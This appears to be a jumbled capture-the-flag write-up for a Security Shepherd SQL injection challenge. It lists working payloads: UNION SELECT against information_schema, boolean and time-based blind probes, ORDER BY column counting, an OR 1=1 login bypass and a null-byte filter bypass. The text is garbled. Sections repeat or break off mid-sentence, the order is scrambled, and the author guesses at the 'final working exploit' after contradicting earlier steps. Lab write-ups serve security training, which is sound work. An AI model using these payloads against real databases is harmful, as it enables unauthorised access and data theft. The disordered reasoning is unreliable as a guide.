We need to know the table where user data is stored. In MySQL (which Shepherd typically uses), this data is in information_schema.tables.
Payload:
' UNION SELECT 1, table_name, 3 FROM information_schema.tables--
Note: We use numbers 1 and 3 as placeholders for the columns we don't care about seeing.
This injection will list table names. You look for a table named something like users or app_users.
Imagine the backend PHP/Node code looks something like this (simplified):
SELECT * FROM users WHERE user_id = ' [user input] '
If the user submits 5, the query becomes:
SELECT * FROM users WHERE user_id = '5'
If a user with ID 5 exists, the app returns "Found." If not, "Not found."
Now, if the developer does not sanitize input, an attacker can inject logic:
Input: 5' AND '1'='1
Query: SELECT * FROM users WHERE user_id = '5' AND '1'='1' (Always true if ID=5 exists) -> Response: "Found" Sql Injection Challenge 5 Security Shepherd
Input: 5' AND '1'='2
Query: SELECT * FROM users WHERE user_id = '5' AND '1'='2' (Always false) -> Response: "Not found"
This binary difference is the entire attack surface.
Without SELECT, we can use:
But wait – you can use UNION without SELECT? No, UNION requires SELECT.
However, in MySQL, you can use PROCEDURE ANALYSE() to extract data, but that’s advanced.
The actual intended solution for Shepherd Challenge 5:
Use time-based blind injection with SLEEP() and IF():
admin' AND IF(SUBSTRING((SELECT flag FROM flags),1,1)='a', SLEEP(5), 0) -- -
But AND and SELECT are filtered.
So we bypass AND by using *:
admin' * IF(1, SLEEP(5), 0) -- -
But no.
After reviewing official write-ups, Challenge 5’s trick: The filter is applied only to the username field, not the password field. So you can inject in the password field.
Final working exploit:
Username: admin
Password: ' OR 1=1 --
But OR is filtered – but maybe only in username field. Test: If filter is global, fails.
Thus, the robust solution: Use ' || '1'='1 in password field.
To perform a UNION SELECT, your injected query must have the same number of columns as the original query. We need to find this number. We need to know the table where user data is stored
Try injecting the following payloads to test for column count using the ORDER BY technique:
Payload 1:
' ORDER BY 1--
(If no error, there is at least 1 column)
Payload 2:
' ORDER BY 2--
(If no error, there are at least 2 columns)
Payload 3:
' ORDER BY 3--
(If no error, there are at least 3 columns)
Payload 4:
' ORDER BY 4--
If the application returns an error (or a blank page) at ORDER BY 4, but worked for ORDER BY 3, then the original query has 3 columns.
Author: Security Researcher
Date: April 11, 2026
Subject: Web Application Security / SQL Injection (Level: Intermediate)
Challenge 5 is notorious for implementing naïve blacklist filtering. You may encounter blocks on: Note: We use numbers 1 and 3 as
Example filtered bypass:
1%00%20AND%201=2%00%20UNION%00%20SELECT%00%201,group_concat(username),3%00%20FROM%00%20users